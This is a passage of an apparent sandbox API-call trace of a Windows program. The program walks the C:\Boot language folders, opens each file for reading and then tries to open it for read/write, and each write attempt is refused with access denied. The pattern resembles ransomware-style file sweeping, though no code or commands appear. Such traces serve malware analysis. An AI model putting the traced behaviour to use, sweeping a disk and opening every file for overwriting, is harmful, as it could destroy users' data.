lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\tr-TR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.879] AreFileApisANSI () returned 1 [0070.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0070.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\tr-TR\\memtest.exe.mui") returned 30 [0070.880] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.880] GetFileType (hFile=0x418) returned 0x1 [0070.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.880] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.880] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.880] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.880] CloseHandle (hObject=0x418) returned 1 [0070.881] AreFileApisANSI () returned 1 [0070.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0070.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\tr-TR\\memtest.exe.mui") returned 30 [0070.881] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.881] GetLastError () returned 0x5 [0070.881] GetLastError () returned 0x5 [0070.881] SetLastError (dwErrCode=0x5) [0070.881] GetLastError () returned 0x5 [0070.881] SetLastError (dwErrCode=0x5) [0070.881] GetLastError () returned 0x5 [0070.881] SetLastError (dwErrCode=0x5) [0070.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.881] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69358, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓놠")) returned 0 [0070.881] FindClose (in: hFindFile=0x78610 | out: hFindFile=0x78610) returned 1 [0070.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0070.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0070.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.882] AreFileApisANSI () returned 1 [0070.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\uk-UA", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\uk-UA", lpUsedDefaultChar=0x0) returned 14 [0070.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0070.882] AreFileApisANSI () returned 1 [0070.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887c0 [0070.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x887c0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\uk-UA") returned 14 [0070.883] CreateFileW (lpFileName="C:\\Boot\\uk-UA" (normalized: "c:\\boot\\uk-ua"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.883] GetLastError () returned 0x5 [0070.883] GetLastError () returned 0x5 [0070.883] SetLastError (dwErrCode=0x5) [0070.883] GetLastError () returned 0x5 [0070.883] SetLastError (dwErrCode=0x5) [0070.883] GetLastError () returned 0x5 [0070.883] SetLastError (dwErrCode=0x5) [0070.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.883] AreFileApisANSI () returned 1 [0070.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0070.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\uk-UA") returned 14 [0070.883] CreateFileW (lpFileName="C:\\Boot\\uk-UA" (normalized: "c:\\boot\\uk-ua"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.883] GetLastError () returned 0x5 [0070.883] GetLastError () returned 0x5 [0070.883] SetLastError (dwErrCode=0x5) [0070.883] GetLastError () returned 0x5 [0070.883] SetLastError (dwErrCode=0x5) [0070.883] GetLastError () returned 0x5 [0070.883] SetLastError (dwErrCode=0x5) [0070.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.884] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0070.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.884] FindFirstFileExW (in: lpFileName="C:\\Boot\\uk-UA\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78490 [0070.884] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.885] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.886] AreFileApisANSI () returned 1 [0070.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\uk-UA\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\uk-UA\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.886] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.886] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.886] AreFileApisANSI () returned 1 [0070.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0070.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 30 [0070.886] CreateFileW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.886] GetFileType (hFile=0x418) returned 0x1 [0070.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.886] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.887] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.887] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.887] CloseHandle (hObject=0x418) returned 1 [0070.887] AreFileApisANSI () returned 1 [0070.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0070.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 30 [0070.887] CreateFileW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.887] GetLastError () returned 0x5 [0070.887] GetLastError () returned 0x5 [0070.887] SetLastError (dwErrCode=0x5) [0070.887] GetLastError () returned 0x5 [0070.887] SetLastError (dwErrCode=0x5) [0070.887] GetLastError () returned 0x5 [0070.887] SetLastError (dwErrCode=0x5) [0070.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.888] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.888] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.888] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69498, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ⵠ\x01⺊Ā")) returned 0 [0070.888] FindClose (in: hFindFile=0x78490 | out: hFindFile=0x78490) returned 1 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0070.888] RtlAllocateHeap 